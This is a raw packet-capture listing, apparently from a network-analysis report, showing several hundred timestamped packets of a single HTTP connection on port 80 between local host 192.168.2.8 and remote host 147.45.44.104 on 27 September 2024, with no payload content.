Sep 27, 2024 01:49:49.167232990 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.167243004 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.167253971 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.167254925 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.167288065 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.167927980 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.167970896 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.168050051 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.168061018 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.168071985 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.168086052 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.168097019 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.168097973 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.168107986 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.168121099 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.168148041 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.254653931 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.254702091 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.254726887 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.254738092 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.254749060 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.254754066 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.254780054 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.254817963 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.254836082 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.254847050 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.254875898 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.254962921 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.254981995 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.254998922 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255002975 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255009890 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255021095 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255028963 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255044937 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255074978 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255115986 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255160093 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255184889 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255196095 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255220890 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255242109 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255251884 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255264044 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255274057 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255291939 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255297899 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255302906 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255315065 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255342007 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255564928 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255575895 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255587101 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255608082 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255635977 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255635977 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255647898 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255659103 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255666971 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255680084 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255702972 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255728006 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255832911 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255872965 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255878925 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255884886 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255913019 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255925894 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255934000 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255938053 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255965948 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255969048 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.255981922 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.255981922 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256004095 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256019115 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256150961 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256194115 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256254911 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256266117 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256274939 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256298065 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256308079 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256328106 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256366968 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256390095 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256407022 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256408930 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256418943 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256428957 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256431103 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256448030 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256464005 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256475925 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256577015 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256589890 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256601095 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256628990 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256644011 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256666899 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256678104 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256689072 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256700993 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256709099 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256724119 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256753922 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256787062 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256797075 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256807089 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256818056 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.256828070 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.256865025 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.259610891 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259623051 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259634972 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259656906 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259669065 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259670019 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.259682894 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.259715080 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.259747028 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259757996 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259778023 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.259809017 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.259912014 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259922981 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259932995 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259948969 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259953976 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.259960890 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259972095 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259973049 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.259982109 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.259993076 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260003090 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260019064 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260035992 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260184050 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260209084 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260217905 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260221958 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260236979 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260256052 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260373116 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260382891 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260394096 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260402918 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260411978 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260438919 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260577917 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260596991 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260607004 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260617971 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260618925 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260636091 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260637045 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260648966 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260659933 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260659933 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260672092 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260683060 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260719061 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260884047 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260894060 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260905981 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260922909 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260937929 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.260962009 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260972977 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260989904 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.260998964 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.261001110 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.261012077 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.261029959 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.261054993 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.346527100 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346544981 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346570015 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346587896 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346600056 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346611977 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346617937 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346623898 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346642971 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.346663952 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346679926 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.346684933 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346694946 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346708059 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346719980 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346721888 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.346729994 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346745968 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.346762896 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346775055 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346776962 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.346787930 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346808910 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.346834898 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.346846104 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346863031 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346873999 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346884966 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.346899986 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346911907 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346920013 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.346921921 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346934080 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346941948 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.346971035 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.346976042 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.346999884 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347008944 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347012043 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347023010 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347033978 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347038031 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347057104 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347090960 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347100973 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347111940 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347124100 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347135067 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347146034 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347170115 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347196102 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347214937 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347225904 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347235918 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347249031 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347258091 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347268105 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347279072 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347291946 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347294092 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347305059 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347312927 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347326040 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347337008 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347337008 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347368002 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347379923 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347390890 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347403049 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347414970 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347425938 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347428083 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347446918 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347484112 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347485065 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347496033 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347507954 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347518921 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347526073 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347529888 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347544909 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347579956 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347583055 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347608089 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347625971 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347626925 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347639084 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347649097 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347650051 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347675085 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347692966 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347718954 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347731113 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347758055 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347762108 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347770929 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347785950 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347790956 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347801924 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347810984 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347814083 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347825050 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347852945 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347867012 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347872972 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347883940 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347893000 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347906113 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347908974 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347915888 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.347940922 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.347973108 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348149061 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348161936 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348172903 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348184109 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348195076 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348201036 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348206997 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348222971 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348237991 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348239899 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348252058 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348263025 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348268986 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348273039 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348284960 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348289013 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348297119 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348315954 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348325968 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348334074 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348341942 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348347902 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348359108 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348371029 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348372936 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348382950 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348393917 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348403931 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348432064 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348439932 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348464012 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348504066 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348505020 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348519087 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348546982 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348562002 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348579884 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348592043 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348602057 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348624945 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348630905 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348640919 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.348644018 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348653078 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348664999 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.348711967 CEST	80	49734	147.45.44.104	192.168.2.8
